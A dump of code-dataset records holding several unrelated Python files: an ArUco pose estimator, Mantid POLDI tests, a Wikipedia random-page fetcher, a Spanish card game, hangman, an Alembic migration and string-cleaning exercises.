output_log(\"\\n--------------------------------------------------------\\n\", \"true\", 20)\n output_log(\"End of run with id: \" + run_id, \"true\", 20)\n output_log(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\\n\", \"true\", 20)\n\n# [END run] \n \n# [START main]\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('commandsFile', help='Delimited file containing the commands to run.')\n parser.add_argument('project_id', help='Project ID to use.', default=\"nsaad-demos\")\n parser.add_argument('output_file', nargs=\"?\", help='Name of the file to use to output the log/results.', default=datetime.now().strftime(\"%Y-%m-%d-%H-%M\"))\n parser.add_argument('multiplier', nargs=\"?\", help='A multiplier to be used to increase the executes of the commands by that multiplier.')\n parser.add_argument('-nco', '--no_console_output', action='store_true', help='A multiplier to be used to increase the executes of the commands by that multiplier.')\n \n args = parser.parse_args()\n \n #Set the global variables from the params\n global project_id, output_file, multiplier, no_console_output, run_id\n project_id = args.project_id\n output_file = args.output_file\n \n #Set up the logging\n log_path = path + \"logs/\" \n output_filename = os.path.join(log_path, output_file)\n \n if not os.path.exists(log_path):\n os.makedirs(log_path)\n \n logging.basicConfig(filename=output_filename + '-output.log', level=logging. DEBUG)\n \n #Set the correct \"no console output\" value\n no_console_output = args.no_console_output\n\n #Set a default value for multiplier to 1 if not passed in\n if (args.multiplier):\n multiplier = args.multiplier\n else: \n multiplier = 1\n \n #ID just to distinguish between different runs of this script if run via the query_load_over_time script\n run_id = str(args.commandsFile) + \"-\" + str(project_id) + \"-\" + multiplier\n \n main(\n args.commandsFile)\n# [END main]","sub_path":"multi_queries.py","file_name":"multi_queries.py","file_ext":"py","file_size_in_byte":17247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"199108428","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 13 13:23:18 2021\r\n\r\n@author: pmrda\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport cv2,glob\r\nimport cv2.aruco as aruco\r\n\r\n'''\r\n# 종료 기준(termination criteria)를 정한다.\r\ncriteria = (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER, 30 ,0.001)\r\n\r\n# Object Point(3D)를 준비한다. (0,0,0),(1,0,0),(2,0,0)... 처럼\r\nobjp = np.zeros((6*8,3),np.float32)\r\n# np,mgrid[0:7,0:6]으로 (2,7,6) 배열 생성\r\n# Transpose 해줘서 (6,7,2)로, reshpae(-1,2)로 flat 시켜서 (42,2)로 변환\r\nobjp[:,:2] = np.mgrid[0:8,0:6].T.reshape(-1,2)\r\n\r\n# 이미지로 부터의 Object point와 Image points를 저장하기 위한 배열\r\nobjpoints = [] # 실제 세계의 3D 점들 \r\nimgpoints = [] # 2D 이미지의 점들\r\n\r\n# 전체 path를 받기 위해 os말고 glob 사용\r\nimages = glob.glob('C:/Users/pmrda/Desktop/calibration/*.png')\r\n\r\nfor name in images:\r\n img = cv2.imread(name)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n # 체스판의 코너들 찾기\r\n ret, corners = cv2.findChessboardCorners(gray,(8,6),None)\r\n\r\n # 찾았으면, Object points, Image points 추가하기 (이후에 수정한다)\r\n if ret == True:\r\n objpoints.append(objp)\r\n\r\n corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\r\n imgpoints.append(corners2)\r\n\r\n # 코너를 그리고 봐보자\r\n img = cv2.drawChessboardCorners(img,(8,6),corners2,ret)\r\n cv2.imshow('img',img)\r\n cv2.waitKey(2000)\r\n \r\ncv2.destroyAllWindows()\r\n\r\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)\r\n\r\n#camera matrix & distortion coeff 확인\r\nprint(\"camera matrix\") \r\nprint(mtx) \r\nprint(\"distortion coeff\") \r\nprint(dist) \r\n'''\r\n\r\n#camera matrix & distortion \r\nmtx = np.array([[574.94769264 , 0. , 304.45999329],\r\n [ 0. , 580.99846129 ,230.35481223]\r\n ,[ 0. , 0. , 1. ]])\r\n\r\ndist = np.array([[ 0.02423695 , 0.08291847 ,-0.00184008 ,-0.00187223, -0.3784548 ]])\r\n\r\ndef track(matrix_coefficients, distortion_coefficients):\r\n while True:\r\n frame = cv2.imread('00001_image.png')\r\n # operations on the frame come here\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Change grayscale\r\n aruco_dict = aruco.Dictionary_get(aruco.DICT_4X4_50) # Use 5x5 dictionary to find markers\r\n parameters = aruco.DetectorParameters_create() # Marker detection parameters\r\n # lists of ids and the corners beloning to each id\r\n corners, ids, rejected_img_points = aruco.detectMarkers(gray, aruco_dict,\r\n parameters=parameters,\r\n cameraMatrix=matrix_coefficients,\r\n distCoeff=distortion_coefficients)\r\n if np.all(ids is not None): # If there are markers found by detector\r\n for i in range(0, len(ids)): # Iterate in markers\r\n # Estimate pose of each marker and return the values rvec and tvec---different from camera coefficients\r\n rvec, tvec, markerPoints = aruco.estimatePoseSingleMarkers(corners[i], 0.02, matrix_coefficients,\r\n distortion_coefficients)\r\n (rvec - tvec).any() # get rid of that nasty numpy value array error\r\n aruco.drawDetectedMarkers(frame, corners) # Draw A square around the markers\r\n aruco.drawAxis(frame, matrix_coefficients, distortion_coefficients, rvec, tvec, 0.01) # Draw Axis\r\n # Display the resulting frame\r\n cv2.imshow('frame', frame)\r\n # Wait 3 milisecoonds for an interaction. Check the key and do the corresponding job.\r\n key = cv2.waitKey(3) & 0xFF\r\n if key == ord('q'): # Quit\r\n break\r\n \r\n # When everything done, release the capture\r\n cv2.destroyAllWindows()\r\n \r\ntrack(mtx,dist)","sub_path":"aruco_pose.py","file_name":"aruco_pose.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25515742","text":"# pylint: disable=no-init,invalid-name,bare-except\nimport stresstesting\nfrom mantid.simpleapi import *\nfrom mantid.api import *\nimport numpy as np\n\n\nclass POLDILoadRunsTest(stresstesting.MantidStressTest):\n \"\"\"This assembly of test cases checks that the behavior of PoldiLoadRuns is correct.\"\"\"\n\n def runTest(self):\n self.loadSingleWorkspace()\n self.loadMultipleSingleWorkspaces()\n self.loadWorkspacesMergeTwo()\n self.loadWorkspacesMergeTwoReverse()\n self.loadWorkspacesNotFound()\n\n self.loadWorkspacesAddToGroup()\n self.loadWorkspacesOverwriteGroup()\n self.loadWorkspacesDontOverwriteOther()\n self.loadWorkspacesOverwriteOther()\n\n self.checkRemoveBadDetectors()\n self.check2015PoldiData()\n\n def loadSingleWorkspace(self):\n singleWs = PoldiLoadRuns(2013, 6904)\n\n self.assertTrue(issubclass(type(singleWs), WorkspaceGroup))\n self.assertTrue(singleWs.contains(\"singleWs_data_6904\"))\n\n self.clearAnalysisDataService()\n\n def loadMultipleSingleWorkspaces(self):\n multipleSingleWs = PoldiLoadRuns(2013, 6903, 6904)\n\n self.assertTrue(issubclass(type(multipleSingleWs), WorkspaceGroup))\n self.assertEquals(len(multipleSingleWs.getNames()), 2)\n\n self.clearAnalysisDataService()\n\n def loadWorkspacesMergeTwo(self):\n twoWorkspacesMerged = PoldiLoadRuns(2013, 6903, 6904, 2)\n\n self.assertTrue(issubclass(type(twoWorkspacesMerged), WorkspaceGroup))\n\n wsNames = twoWorkspacesMerged.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"twoWorkspacesMerged_data_6904\")\n\n self.clearAnalysisDataService()\n\n def loadWorkspacesMergeTwoReverse(self):\n twoWorkspacesMergedReversed = PoldiLoadRuns(2013, 6904, 6903, 2)\n\n self.assertTrue(issubclass(type(twoWorkspacesMergedReversed), WorkspaceGroup))\n\n wsNames = twoWorkspacesMergedReversed.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"twoWorkspacesMergedReversed_data_6904\")\n\n PoldiLoadRuns(2013, 6903, 6904, 2, OutputWorkspace=\"twoWorkspacesMerged\")\n\n wsMergedReversed = AnalysisDataService.retrieve(\"twoWorkspacesMergedReversed_data_6904\")\n wsMerged = AnalysisDataService.retrieve(\"twoWorkspacesMerged_data_6904\")\n\n self.compareWorkspaces(wsMergedReversed, wsMerged)\n\n self.clearAnalysisDataService()\n\n def loadWorkspacesMergeThreeNotWorking(self):\n try:\n PoldiLoadRuns(2013, 6903, 6904, 3, OutputWorkspace=\"threeWorkspacesFail\")\n self.assertTrue(False)\n except:\n self.assertTrue(True)\n\n def loadWorkspacesNotFound(self):\n try:\n PoldiLoadRuns(1990, 6903, OutputWorkspace=\"notFound\")\n self.assertTrue(False)\n except:\n self.assertTrue(True)\n\n def loadWorkspacesAddToGroup(self):\n wsGroup = PoldiLoadRuns(2013, 6903)\n\n wsNames = wsGroup.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"wsGroup_data_6903\")\n\n wsGroup = PoldiLoadRuns(2013, 6904, OverwriteExistingWorkspace=False)\n\n wsNames = wsGroup.getNames()\n self.assertEquals(len(wsNames), 2)\n self.assertEquals(wsNames[0], \"wsGroup_data_6903\")\n self.assertEquals(wsNames[1], \"wsGroup_data_6904\")\n\n self.clearAnalysisDataService()\n\n def loadWorkspacesOverwriteGroup(self):\n wsGroup = PoldiLoadRuns(2013, 6903)\n\n wsNames = wsGroup.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"wsGroup_data_6903\")\n\n wsGroup = PoldiLoadRuns(2013, 6904, OverwriteExistingWorkspace=True)\n\n wsNames = wsGroup.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"wsGroup_data_6904\")\n\n def loadWorkspacesOverwriteOther(self):\n otherWs = CreateWorkspace(1.0, 1.0)\n\n self.assertTrue(issubclass(type(otherWs), Workspace))\n\n otherWs = PoldiLoadRuns(2013, 6904, OverwriteExistingWorkspace=True)\n\n self.assertTrue(issubclass(type(otherWs), WorkspaceGroup))\n wsNames = otherWs.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"otherWs_data_6904\")\n\n def loadWorkspacesDontOverwriteOther(self):\n otherWs = CreateWorkspace(1.0, 1.0)\n\n self.assertTrue(issubclass(type(otherWs), Workspace))\n\n otherWs = PoldiLoadRuns(2013, 6904, OverwriteExistingWorkspace=False)\n\n self.assertTrue(issubclass(type(otherWs), Workspace))\n\n def checkRemoveBadDetectors(self):\n # Determine bad detectors automatically\n PoldiLoadRuns(2013, 6903, 6904, 2, MaskBadDetectors=True,\n BadDetectorThreshold=2.5,\n OutputWorkspace='twoWorkspacesMerged')\n\n wsMerged = AnalysisDataService.retrieve(\"twoWorkspacesMerged_data_6904\")\n self.assertEquals(len([True for x in range(wsMerged.getNumberHistograms()) if wsMerged.getDetector(\n x).isMasked()]), 36)\n\n self.clearAnalysisDataService()\n\n # Lower threshold, more excluded detectors\n PoldiLoadRuns(2013, 6903, 6904, 2, MaskBadDetectors=True,\n BadDetectorThreshold=2.0,\n OutputWorkspace='twoWorkspacesMerged')\n\n wsMerged = AnalysisDataService.retrieve(\"twoWorkspacesMerged_data_6904\")\n self.assertEquals(len([True for x in range(wsMerged.getNumberHistograms()) if wsMerged.getDetector(\n x).isMasked()]), 49)\n\n self.clearAnalysisDataService()\n\n # Only use those from the IDF\n PoldiLoadRuns(2013, 6903, 6904, 2, MaskBadDetectors=False,\n OutputWorkspace='twoWorkspacesMerged')\n\n wsMerged = AnalysisDataService.retrieve(\"twoWorkspacesMerged_data_6904\")\n self.assertEquals(len([True for x in range(wsMerged.getNumberHistograms()) if wsMerged.getDetector(\n x).isMasked()]), 12)\n\n self.clearAnalysisDataService()\n\n def check2015PoldiData(self):\n PoldiLoadRuns(2015, 977, OutputWorkspace='ws')\n\n ws2015 = AnalysisDataService.retrieve('ws_data_977')\n self.assertEquals(ws2015.getNumberHistograms(), 400)\n self.assertEquals(len(ws2015.readX(0)), 125)\n self.assertTrue(ws2015.run().hasProperty('chopperspeed'))\n\n self.clearAnalysisDataService()\n\n\n\n def compareWorkspaces(self, left, right):\n for i in range(left.getNumberHistograms()):\n self.assertTrue(np.array_equal(left.dataY(i), right.dataY(i)))\n\n def clearAnalysisDataService(self):\n AnalysisDataService.clear()\n","sub_path":"Testing/SystemTests/tests/analysis/POLDILoadRunsTest.py","file_name":"POLDILoadRunsTest.py","file_ext":"py","file_size_in_byte":6692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358964839","text":"import bs4\nimport requests\nfrom openpyxl import Workbook\n\nwb = Workbook()\n\nheaders = {\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\", \"Accept-Encoding\":\"gzip, deflate\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"DNT\":\"1\",\"Connection\":\"close\",\n \"Upgrade-Insecure-Requests\":\"1\"\n }\nurl ='https://en.wikipedia.org/wiki/Special:Random'\n\nwhile True:\n response = requests.get(url, headers=headers) #get url\n soup = bs4.BeautifulSoup(response.content, \"lxml\") #get page content\n\n wikiName = soup.find('h1', attrs={'class':'firstHeading'}).text.strip() #get page title\n print('-'*50)\n print('Title: ', wikiName)\n print('Link: ', response.url)\n userChoice = input('\\nKeep randomizing wikipedias\\'s pages? (Y/N)').lower()\n if userChoice in 'n':\n break\n else:\n userChoice = ''\n\n\n","sub_path":"projetos simples/randomWikipediaArticle.py","file_name":"randomWikipediaArticle.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"539965927","text":"class Card:\n '''\n Class of a Card.\n Methods:\n - __init__(suit, number)\n - __str__()\n - compare(other)\n '''\n\n suit_list = ['Oro', 'Basto', 'Espada', 'Copa']\n number_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n\n def __init__(self, suit, number):\n if number == 1 or number == 2:\n self.number = number + 12 # from 1 to 2\n else:\n self.number = number # from 3 to 12\n\n self.suit = suit\n\n def __str__(self):\n if self.number > 12:\n name = self.suit_list[self.suit] + ' - ' + str(self.number - 12)\n else:\n name = self.suit_list[self.suit] + ' - ' + str(self.number)\n\n return name\n\n def compare(self, other):\n\n bool = -1\n if other.number == self.number:\n bool = 0\n elif self.number == 2 and self.suit_list(self.suit) == 'Oro':\n bool = 1\n elif other.number == 7:\n if self.number == 7 or self.number == 8:\n bool = 1\n else:\n bool = -1\n elif other.number == 10:\n if self.number <= 10:\n bool = 1\n else:\n bool = -1\n elif self.number >= other.number:\n bool = 1\n else:\n bool = -1\n\n return bool\n\n\nclass Deck:\n '''\n Class of Deck formed by cards.\n Methods:\n - __init__ (name = optional)\n - __add__card (card)\n - remove_card (card)\n - shuffle()\n - pop_card()\n - is_empty()\n - deal(hands, nCards = optional):\n '''\n\n def __init__(self):\n self.cards = []\n for suit in range(len(Card.suit_list)):\n for rank in range(1, len(Card.number_list) + 1):\n self.cards.append(Card(suit, rank))\n\n def __str__(self):\n s = \"\"\n for i in range(len(self.cards)):\n return str(self.cards[i]) + \"\\n\"\n\n return s\n\n def remove_card(self, card):\n if card in self.cards:\n self.cards.remove(card)\n return True\n else:\n return False\n\n def shuffle(self):\n import random\n nCards = len(self.cards)\n for i in range(nCards):\n j = random.randrange(i, nCards)\n self.cards[i], self.cards[j] = self.cards[j], self.cards[i]\n\n def pop_card(self):\n return self.cards.pop()\n\n def is_empty(self):\n return (len(self.cards) == 0)\n\n def deal(self, hands, nCards=999):\n nHands = len(hands)\n for i in range(nCards):\n if self.is_empty():\n break\n card = self.pop_card()\n hand = hands[i % nHands]\n hand.add_card(card)\n\n\nclass Hand(Deck):\n '''\n Class of Hand with the different actions (methods) that a player in a card game normally does.\n It receives as an input:\n - :param Deck:\n Methods:\n - __init__ (name = optional)\n - __add__card (card)\n - __str__\n - cards_to_play(other)\n '''\n def __init__(self, name=\"\"):\n self.cards = []\n self.name = name\n\n def add_card(self, card):\n self.cards.append(card)\n\n def __str__(self):\n s = \"\"\n p = 0\n for i in range(len(self.cards)):\n s = s + p * ' - ' + str(self.cards[i])\n p = 1\n return s\n\n def cards_to_play(self, other):\n s = \"\"\n p = 0\n potential_play = []\n\n for i in range(len(self.cards)):\n\n card = self.cards[i]\n\n if other == '':\n s = s + p * ' || ' + '(' + str(i) + ') ' + str(card) + \" True \"\n p = 1\n potential_play.append(1)\n\n elif card.compare(other) == -1:\n s = s + p * ' || ' + '(' + str(i) + ') ' + str(card) + \" False \"\n p = 1\n potential_play.append(card.compare(other))\n\n elif card.compare(other) == 1:\n s = s + p * ' || ' + '(' + str(i) + ') ' + str(card) + \" True \"\n p = 1\n potential_play.append(card.compare(other))\n\n else:\n s = s + p * ' || ' + '(' + str(i) + ') ' + str(card) + \" False \"\n p = 1\n potential_play.append(card.compare(other))\n\n return [s, potential_play]\n\n\ndef start_game(Deck, Hand):\n '''\n The function start_game initialises the game by asking the number of players and dealing the deck among the players.\n :param Deck: Class of Deck\n :param Hand: Class of Hand\n The output:\n :return players_hand: Hands of the players. Each hand contains several cards.\n '''\n print('------------------------ THE CAPITALISTA GAME ------------------------\\n'\n 'Welcome to read the rules of the game go to capitalista code below or run help(capitalista) in the terminal.')\n print(' - Select the number of players: ')\n bool = False\n while bool == False:\n\n input_num = input()\n\n try:\n num_players = int(input_num)\n if num_players > 10:\n print('Select a reasonable number of players: ')\n else:\n bool = True\n break\n except:\n print('Introduce a correct number!')\n bool = False\n\n if bool == True:\n deck = Deck()\n\n players_hand = []\n\n for i in range(num_players):\n name = 'Player ' + str(i)\n players_hand.append(Hand(name))\n\n deck.deal(players_hand)\n\n return players_hand\n\n\ndef card_election(players_hand, card_table, id_player):\n '''\n The function card_election enables the player to choose between their different cards in their hand.\n Some cards could not be played depending on the value of card in the table.\n It receives as inputs:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n :param card_table: Card on the table that the player must overcome (type Card)\n :param id_player: Index indicating the player that will play (type )\n And the output variables:\n :return: A vector with:\n - potential(index): Value that indicates if the player has skipped their turn (-1), played a similar number (0) or another card that fulfills requirements (1) (type )\n - card_to_play: Card selected by the player\n '''\n print('It is the turn of ', players_hand[id_player].name, ':')\n [s, potentials] = players_hand[id_player].cards_to_play(card_table)\n print(s)\n print('---------------------------------------')\n print('Choose a possible election (enter N if you want to retire from this hand):')\n\n bool = False\n\n while bool == False:\n input_num = str(input())\n if input_num == 'N' or input_num == 'n':\n return [-1, card_table]\n else:\n try:\n index = int(input_num)\n if (potentials[index] == 1 or potentials[index] == 0) and index < len(potentials):\n card_to_play = players_hand[id_player].cards[index]\n bool = True\n\n print(' ====> ', players_hand[id_player].name, ' played ', card_to_play)\n\n print('--------------------------------------')\n print(' - Card in the Table: ', card_to_play)\n\n return [potentials[index], card_to_play]\n else:\n print(' Enter a possible index to play!')\n except:\n print(' Enter a number please')\n\n\ndef next_player (players_on_round, id_player_ant, increment):\n '''\n The function next_player determines the following player that will play in this round.\n Note that some players could have retired in this round so they cannot play during this round.\n It receives as inputs:\n :param players_on_round: Vector with a boolean of the players still playing on this round (type )\n :param id_player_ant: Index of the player that was playing during this round (type )\n :param increment: Number of players minus 1 that cannot play (type ) (see Rules of the Capitalista)\n And the output variables:\n :return id: Index of the player that will play after this play (type )\n '''\n num_players = len(players_on_round)\n id = id_player_ant + increment\n id = id % num_players\n\n found = False\n\n while found == False:\n if players_on_round[id] == 0:\n found = True\n else:\n id = id + 1\n id = id % num_players\n\n return id\n\n\ndef next_play(players_hand, card_table, players_on_round, first_play=False, id_player=0):\n '''\n The function next_play computes the play of a player, by showing their hand and asking about their next decision.\n It receives the following input variables:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n :param card_table: Card on the table that the player must overcome (type Card)\n :param players_on_round: Vector with a boolean of the players still playing on this round (type )\n :param first_play: Bool that indicates that the game is starting (type )\n :param id_player: Index indicating the player that will play (type )\n And the output variables:\n :return: a vector with:\n - id_player: Index indicating the player that will play the next play (type )\n - card_selected: Card selected by the player (type Card)\n - player_continue: Bool that indicates if the player will continue playing in this round (type )\n '''\n num_players_finished = 0\n num_players = len(players_hand)\n\n if first_play == True:\n [id, card_to_play] = search_card(players_hand, card_table)\n show_cards_to_players(players_hand)\n\n print(' ====> ', players_hand[id].name, ' played ', card_to_play)\n\n print('--------------------------------------------------')\n print(' - Card in the Table: ', card_table)\n\n card_table = card_to_play\n\n players_hand[id].remove_card(card_to_play)\n id_player = id + 1;\n id_player = id_player % num_players\n\n return [id_player, card_table, True]\n\n else:\n\n [value, card_selected] = card_election(players_hand, card_table, id_player)\n\n if value == 0:\n players_hand[id_player].remove_card(card_selected)\n id_player = next_player(players_on_round, id_player, 2)\n player_continue = True\n elif value == 1:\n players_hand[id_player].remove_card(card_selected)\n id_player = next_player(players_on_round, id_player, 1)\n player_continue = True\n else: # value = -1\n players_on_round[id_player] = 1\n id_player = next_player(players_on_round, id_player, 1)\n player_continue = False\n\n return [id_player, card_selected, player_continue]\n\n\ndef show_cards_to_players(players_hand):\n '''\n The show_cards_to_players prints the cards of the players and how many they have left.\n It receives the following input variables:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n It doesn't have an output variable.\n '''\n for i in range(len(players_hand)):\n cards_left = len(players_hand[i].cards)\n print(players_hand[i].name + ' - Left: ', cards_left)\n print(players_hand[i])\n\n\ndef search_card (players_hand, card_to_search, id=0):\n '''\n The search_card function searches for a card between the hands of the players.\n It receives the following input variables:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n :param card_to_search [suit number] Card we are looking for (type )\n :param id: Index of the player (if we know which player is the holder) (type )\n And the output variables:\n :return: a vector with:\n - i : Index of the player owning the card we were looking for) (type )\n - card : the card we were looking for (type Card)\n '''\n if id == 0:\n for i in range(len(players_hand)):\n for card in players_hand[i].cards:\n if card_to_search.number == card.number and card_to_search.suit == card.suit:\n return [i, card]\n break\n else:\n for card in players_hand[id].cards:\n if card_to_search.number == card.number and card_to_search.suit == card.suit:\n return [id, card]\n break\n\n\ndef check_finish(players_hand, num_players_finished):\n '''\n The function check_finish checks if a player has no cards left in their hand.\n The input variables are:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n :param num_players_finished: Number of players that have finished the game\n And the output:\n :return num_players_finished: Number of players that have finished the game updated\n \n '''\n for hand in players_hand:\n if hand.is_empty() == 0:\n num_players_finished = num_players_finished + 1\n if num_players_finished == 1:\n print('\\n \\n THE WINNER IS', hand.name)\n\n return [num_players_finished]\n\n\ndef capitalista():\n '''\n This is the main function of the game of cards : Capitalista. The game is played if a Spanish deck.\n Spanish deck is formed by four suits: Oro, Espada, Bastos and Copa; and numbers are from 1 to 12.\n The whole game is run using the terminal.\n The rules of the game are the following:\n - Numbers ordered from smaller to bigger:\n 3 - 4 - 5 - 6 - 7 - 8 - 9 - 10 - 11 - 12 - 1 - 2\n - In order to start the game, the player with the 3 of Oro starts the game.\n - After a 7, the following player must play a 7 or/and 8\n - After a 10, the following player must play a card with a score below or equal to 10.\n - The highest car is 2. And the card that works in every situation is the 2 of Oro.\n - If a player sets the same number of a card as the one in the table, the following player will be skipped but they will continue playing in this round\n - If a player cannot play or does not want to play, the player will no longer be playing in this round\n - A round is ended when only one player is playing. After a round ends all players (with cards left) will be playing again.\n :return:\n '''\n\n card_start = Card(0, 3)\n players_hand = start_game(Deck, Hand)\n\n print(' - The hands of each player are:')\n players_out_round = []\n for i in range(0, len(players_hand)):\n players_out_round.append(0)\n\n [id_player, card_table, player_continue] = next_play(players_hand, card_start, players_out_round , True)\n\n num_players_finished = 0\n num_plays = 0\n num_players_out_round = 0\n\n while num_players_finished != len(players_hand):\n if num_players_out_round != len(players_hand)-1:\n [id_new, card_table, player_continue] = next_play(players_hand, card_table, players_out_round, False, id_player)\n if player_continue == False:\n players_out_round[id_player] = 1\n num_players_out_round = num_players_out_round + 1\n id_player = id_new\n else:\n for i in range(0, len(players_hand)):\n players_out_round[i] = 0\n print('\\n NEW ROUND: ')\n [id_new, card_table, player_continue] = next_play(players_hand, '', players_out_round, False)\n num_plays = num_plays + 1\n\n [num_players_finished] = check_finish(players_hand, num_players_finished)\n\n\nif __name__ == '__main__':\n capitalista()\n\n\n","sub_path":"Python/Capitalista_Card_Game/capitalista_main.py","file_name":"capitalista_main.py","file_ext":"py","file_size_in_byte":15985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"247915451","text":"import random\nimport os\nfrom time import sleep \n \ndef clear(): \n # for windows \n if os.name == 'nt': \n _ = os.system('cls') \n \n # for mac and linux(here, os.name is 'posix') \n else: \n _ = os.system('clear') \n\ndef word_status(word, letters):\n outputString = \"\"\n for letter in word:\n if letter in letters:\n outputString += letter\n else:\n outputString += \"_\"\n\n outputString += \" \"\n \n return outputString\n\n\ndef letter_status(letters):\n outputString = \"\"\n for letter in letters:\n outputString += letter + \" \"\n return outputString\n\n\ndef word_guessed(word, letters):\n return all(x in letters for x in word)\n\n########################################################\n###################### WORD LIST #######################\n\n# Initialize the word list\nwords = []\n\n# Load words from file\nwith open(\"Hangman/hangman_words.txt\", \"r\") as wordFile:\n for line in wordFile:\n words.append(line.strip())\n\n########################################################\n###################### VARIABLES #######################\n\n# The maximum number of guesses\nguesses = 9\n# The numbers of guesses currently used\nguessesUsed = 0\n# The letters the user already guessed\nlettersGuessed = []\n# The word the user needs to guess\nword = random.choice(words)\ndel words\n\n########################################################\n####################### PROGRAM ########################\n\nwhile guessesUsed < guesses:\n clear()\n print(letter_status(lettersGuessed))\n print(word_status(word, lettersGuessed))\n char = input(\"enter a character: \")\n\n if len(char) != 1 or not char.isalpha():\n print(\"Not a character\")\n continue\n\n char = char.lower()\n\n if char not in lettersGuessed:\n lettersGuessed.append(char)\n guessesUsed += 1\n else:\n print (\"character already guessed.. please enter a character you haven't already guessed\")\n continue\n\n if (word_guessed(word, lettersGuessed)):\n break\n\nif (word_guessed(word, lettersGuessed)):\n clear()\n print(word_status(word, lettersGuessed))\n print(\"Correct!\")","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"170965573","text":"\"\"\"empty message\n\nRevision ID: d67f8c46e34e\nRevises: e12b78b48315\nCreate Date: 2019-12-04 20:37:26.876328\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd67f8c46e34e'\ndown_revision = 'e12b78b48315'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n # op.add_column('users', sa.Column('profile_image', sa.String(), nullable=False))\n with op.batch_alter_table('users') as batch_op:\n batch_op.drop_column('profile_img')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('profile_img', sa.VARCHAR(), nullable=False))\n op.drop_column('users', 'profile_image')\n # ### end Alembic commands ###\n","sub_path":"build_along/blog-project/migrations/versions/d67f8c46e34e_.py","file_name":"d67f8c46e34e_.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"885833","text":"import string\nimport re\n\n\ndef scrub_numbers(input: str) -> str:\n return re.sub(r\"\\d\", \"\", input)\n\n\ndef gentle_clean(input: str) -> str:\n input = re.sub(r\"[-_]\", \" \", input)\n return input.replace(\" \", \" \")\n\n\ndef clean_data(input: str) -> str:\n return gentle_clean(scrub_numbers(input)).strip()\n\n\ndef some_scrubber(input: str) -> str:\n return re.sub(r\"(?<=[\\w\\.]) \", \"\", input).replace(\" \", \" \")\n\n\ndef mr_clean(input: str) -> str:\n return re.sub(r\"(?<=[\\w ])\", \" \", input).replace(\" \", \" \")\n\n\ndef ms_clean(input: str) -> str:\n input = input.split(\" \")\n out = []\n for s in input:\n out.append(f\"{s[0]}{len(s) - 2}{s[len(s) - 1]}\")\n return \" \".join(out)\n\n\ndef strong_cleaner(input: str) -> str:\n c = input[0]\n return c + re.sub(r\"[!@#$%^&*()\\dA-Z]\", \"\", input)\n\n\ndef extracto(input):\n total = 0\n for n in string.digits:\n total += int(n) * input.count(n)\n return total\n\n\nprint(scrub_numbers('Be9autiful9 i4s be2tter th4an ug42ly'))\nprint(gentle_clean('Explicit_is-better_than -implicit'))\nprint(clean_data(' 42Simple-is_better_than-compl9ex '))\nprint(some_scrubber('F l a t i s b e t t e r t h a n n e s t e d . '))\nprint(mr_clean('Sparse is better than dense'))\nprint(ms_clean('Readability counts'))\nprint(strong_cleaner('Err@#%$ors sho@#$@#$uld nev1!$#@er pass sile&I&&*(ntly'))\nprint(extracto('1S2pe3cia4l ca5ses ar6en\\'t \\\nsp7ecial en8ough to b9reak the r0ules.'))\nprint(extracto('2S4pe6cia8l ca0ses ar2en\\'t \\\nsp4ecial en6ough to b8reak the r0ules.'))\nprint(extracto('3S6pe9cia2l ca5ses ar8en\\'t \\\nsp1ecial en4ough to b7reak the r0ules.'))\n","sub_path":"python/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152207980","text":"#\n# Copyright (c), 2018-2020, SISSA (International School for Advanced Studies).\n# All rights reserved.\n# This file is 